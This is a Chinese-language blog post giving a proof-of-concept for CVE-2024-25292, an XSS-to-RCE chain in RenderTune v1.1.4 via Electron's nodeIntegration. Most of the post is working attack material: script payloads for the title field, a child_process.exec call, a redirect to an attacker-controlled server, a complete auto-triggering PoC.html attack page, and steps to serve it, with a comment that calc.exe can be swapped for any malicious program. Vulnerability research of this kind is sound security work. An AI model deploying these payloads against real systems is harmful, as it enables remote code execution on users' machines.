RenderTune RCE 漏洞利用演示 - XSS到远程代码执行

用户5191495848452026-04-11 10:53

RenderTune RCE - CVE-2024-25292 漏洞概念验证

本项目是针对 CVE-2024-25292 漏洞的概念验证(Proof-of-Concept)。该漏洞存在于 RenderTune v1.1.4 中,允许攻击者通过构造恶意负载注入到"上传标题"(Upload Title)参数,从而执行任意 Web 脚本或 HTML 代码,并进一步利用 Electron 框架的配置缺陷实现远程代码执行(RCE)。

功能特性

  • XSS 漏洞利用:演示如何通过 Markdown 链接或脚本标签在标题字段注入恶意代码
  • RCE 实现 :利用 Electron 中 nodeIntegration 开启的配置,通过 Node.js 子进程执行系统命令
  • 攻击服务器模拟:提供完整的攻击页面代码,可部署于攻击者服务器进行自动化利用
  • 自动触发机制:页面加载时自动执行恶意代码,无需用户点击交互

安装指南

本项目为漏洞演示代码,无需安装额外依赖。运行攻击服务器需要 Python 环境。

系统要求

  • Python 3.x(用于启动简易 HTTP 服务器)
  • 现代浏览器(用于访问攻击页面)
  • 目标环境:RenderTune v1.1.4 或 nteract 0.28.0(存在漏洞的版本)

启动攻击服务器

bash 复制代码 
# 在存放 PoC.html 的目录下执行
python -m http.server 80

使用说明

漏洞利用步骤

场景一:XSS 到 RCE

步骤 1:确认标题部分存在 XSS 漏洞(需同时上传图片文件才能注册项目)

html 复制代码 
<b>jruru</b>

步骤 2:使用 XSS 执行 Node.js 系统命令

html 复制代码 
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>
场景二:通过攻击者服务器进行攻击

当应用每次运行时,使用 window.location 自动跳转到攻击者控制的页面。

html 复制代码 
<script>window.location='http://[attacker IP]/PoC.html'</script>

完整攻击页面代码

将以下内容保存为 PoC.html,放置在攻击服务器的 Web 根目录下:

html 复制代码 
<html>
<head>
  <title>jruru Link</title>
</head>
<body>

  <a id="jruruLink" href="#" onclick="openExternal()">jruru Link</a>

  <script>
    function openExternal() {
      try {
        const { shell } = require('electron');
        shell.openExternal('file:C:/Windows/System32/calc.exe');
      } catch(e) {
        alert('JRURU');
        alert(e);
      }
    }

    document.addEventListener('DOMContentLoaded', function() {
      openExternal();
    });
  </script>
</body>
</html>

核心代码

漏洞利用核心 - 自动执行 RCE

以下代码演示了页面加载后自动通过 Electron 的 shell 模块打开系统计算器,实现远程代码执行:

javascript 复制代码 
// 利用 Electron 的 nodeIntegration 特性,直接调用 Node.js 模块
function openExternal() {
  try {
    // 从 Electron 中解构 shell 模块
    const { shell } = require('electron');
    // 打开系统文件路径,实际可替换为任意恶意程序路径
    shell.openExternal('file:C:/Windows/System32/calc.exe');
  } catch(e) {
    alert('JRURU');
    alert(e);
  }
}

// 页面加载完成后自动触发,无需用户交互
document.addEventListener('DOMContentLoaded', function() {
  openExternal();
});

XSS 注入载荷示例

html 复制代码 
<!-- 基础 XSS 验证 -->
<b>jruru</b>

<!-- 执行 Node.js 命令的 XSS 载荷 -->
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>

<!-- 重定向到攻击者服务器的载荷 -->
<script>window.location='http://[attacker IP]/PoC.html'</script>

漏洞利用原理

  1. RenderTune v1.1.4 在处理 Markdown 链接时,会创建 Electron WebView
  2. WebView 配置中 nodeIntegration 被设置为 true,允许在渲染进程中访问 Node.js API
  3. 攻击者通过 XSS 注入脚本,调用 require('child_process').exec()require('electron').shell.openExternal()
  4. 成功实现从 XSS 到 RCE 的完整攻击链 6HFtX5dABrKlqXeO5PUv/w4WElzZ7wu3Vcpj0XEsVLE=
相关推荐
Tutankaaa10 分钟前
知识竞赛题库设计全攻略
人工智能·算法
TImCheng060918 分钟前
职场人AI学习周期评估:不同学习路径的时间成本
人工智能·学习
m0_4665252934 分钟前
酷特AGI:从“自家试验田”到“全球输出”
大数据·人工智能·agi
星爷AG I34 分钟前
20-1 记忆概览(AGI基础理论)
人工智能·agi
锕琅36 分钟前
OpenAI Codex使用教程-GPT功能配置
人工智能·gpt·codex
鹏子训38 分钟前
AI记忆新思路:用SQLite替代向量数据库,去EMBEDDINGS化,谷歌开源Google Always On Memory Agent
数据库·人工智能·sqlite·embedding
xyz59940 分钟前
ONNX Runtime(ORT) C++ Windows 深度学习模型部署简易教程
人工智能·深度学习
市象41 分钟前
AI带给TCL空调的头部假想
大数据·人工智能
武汉知识图谱科技1 小时前
国家首次探索“词元交易”:大模型时代的知识产权困境与知识图谱的“价值锚定”机会
人工智能·知识图谱
实在智能RPA1 小时前
金融行业财务审核自动化工具推荐:2026企业级AI Agent与智能合规选型指南
人工智能·ai·金融·自动化
热门推荐
01GitHub 镜像站点02要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法03Codex 接入 DeepSeek API 完整配置文档04裂开!ChatGPT 居然开始要手机号验证,附详细解决方法05【AI】2026 年具身智能模型和世界模型总结062026年4月AI大事件深度解读:大模型竞争进入“深水区“07实测可用|小米 MiMo 百万亿 Token 免费领,开发者速冲08近期有什么ai的新消息,新动态? 2026.4月092026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot10在Windows 11上安装Docker的踩坑记录